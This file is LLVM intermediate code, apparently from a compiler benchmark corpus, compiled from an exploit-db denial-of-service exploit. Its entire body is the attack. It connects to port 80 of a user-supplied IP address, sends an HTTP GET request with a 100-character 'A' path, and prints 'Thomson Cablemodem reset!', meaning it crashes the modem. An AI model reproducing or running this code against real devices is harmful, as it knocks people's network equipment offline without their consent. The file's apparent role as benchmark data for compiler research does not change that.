; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/hardware/dos/extr_23394.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/hardware/dos/extr_23394.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sockaddr_in = type { %struct.TYPE_2__, i32, i32 }
%struct.TYPE_2__ = type { i32 }
%struct.sockaddr = type { i32 }

@AF_INET = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [23 x i8] c"GET /%s HTTP/1.1\0D\0A\0D\0A\0D\0A\00", align 1
@SOCK_STREAM = common dso_local global i32 0, align 4
@IPPROTO_TCP = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [33 x i8] c"done. Thomson Cablemodem reset!\0A\00", align 1
@.str.2 = private unnamed_addr constant [26 x i8] c"Unable to connect to CM.\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca [150 x i8], align 16
  %6 = alloca [1000 x i8], align 16
  %7 = alloca %struct.sockaddr_in, align 4
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %10 = call i32 @MAKEWORD(i32 1, i32 1)
  %11 = call i32 @WSAStartup(i32 %10, i32* %9)
  %12 = load i32, i32* @AF_INET, align 4
  %13 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 2
  store i32 %12, i32* %13, align 4
  %14 = call i32 @htons(i32 80)
  %15 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 1
  store i32 %14, i32* %15, align 4
  %16 = load i8**, i8*** %4, align 8
  %17 = getelementptr inbounds i8*, i8** %16, i64 1
  %18 = load i8*, i8** %17, align 8
  %19 = call i32 @inet_addr(i8* %18)
  %20 = getelementptr inbounds %struct.sockaddr_in, %struct.sockaddr_in* %7, i32 0, i32 0
  %21 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %20, i32 0, i32 0
  store i32 %19, i32* %21, align 4
  %22 = getelementptr inbounds [150 x i8], [150 x i8]* %5, i64 0, i64 0
  %23 = call i32 @memset(i8* %22, i8 signext 0, i32 150)
  %24 = getelementptr inbounds [150 x i8], [150 x i8]* %5, i64 0, i64 0
  %25 = call i32 @memset(i8* %24, i8 signext 65, i32 100)
  %26 = getelementptr inbounds [1000 x i8], [1000 x i8]* %6, i64 0, i64 0
  %27 = getelementptr inbounds [150 x i8], [150 x i8]* %5, i64 0, i64 0
  %28 = call i32 @sprintf(i8* %26, i8* getelementptr inbounds ([23 x i8], [23 x i8]* @.str, i64 0, i64 0), i8* %27)
  %29 = load i32, i32* @AF_INET, align 4
  %30 = load i32, i32* @SOCK_STREAM, align 4
  %31 = load i32, i32* @IPPROTO_TCP, align 4
  %32 = call i32 @socket(i32 %29, i32 %30, i32 %31)
  store i32 %32, i32* %8, align 4
  %33 = load i32, i32* %8, align 4
  %34 = bitcast %struct.sockaddr_in* %7 to %struct.sockaddr*
  %35 = call i32 @connect(i32 %33, %struct.sockaddr* %34, i32 12)
  %36 = icmp ne i32 %35, -1
  br i1 %36, label %37, label %45

37:                                               ; preds = %2
  %38 = load i32, i32* %8, align 4
  %39 = getelementptr inbounds [1000 x i8], [1000 x i8]* %6, i64 0, i64 0
  %40 = getelementptr inbounds [1000 x i8], [1000 x i8]* %6, i64 0, i64 0
  %41 = call i32 @strlen(i8* %40)
  %42 = call i32 @send(i32 %38, i8* %39, i32 %41, i32 0)
  %43 = call i32 @printf(i8* getelementptr inbounds ([33 x i8], [33 x i8]* @.str.1, i64 0, i64 0))
  %44 = call i32 @sleep(i32 100)
  br label %47

45:                                               ; preds = %2
  %46 = call i32 @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.2, i64 0, i64 0))
  br label %47

47:                                               ; preds = %45, %37
  ret void
}

declare dso_local i32 @WSAStartup(i32, i32*) #1

declare dso_local i32 @MAKEWORD(i32, i32) #1

declare dso_local i32 @htons(i32) #1

declare dso_local i32 @inet_addr(i8*) #1

declare dso_local i32 @memset(i8*, i8 signext, i32) #1

declare dso_local i32 @sprintf(i8*, i8*, i8*) #1

declare dso_local i32 @socket(i32, i32, i32) #1

declare dso_local i32 @connect(i32, %struct.sockaddr*, i32) #1

declare dso_local i32 @send(i32, i8*, i32, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @sleep(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
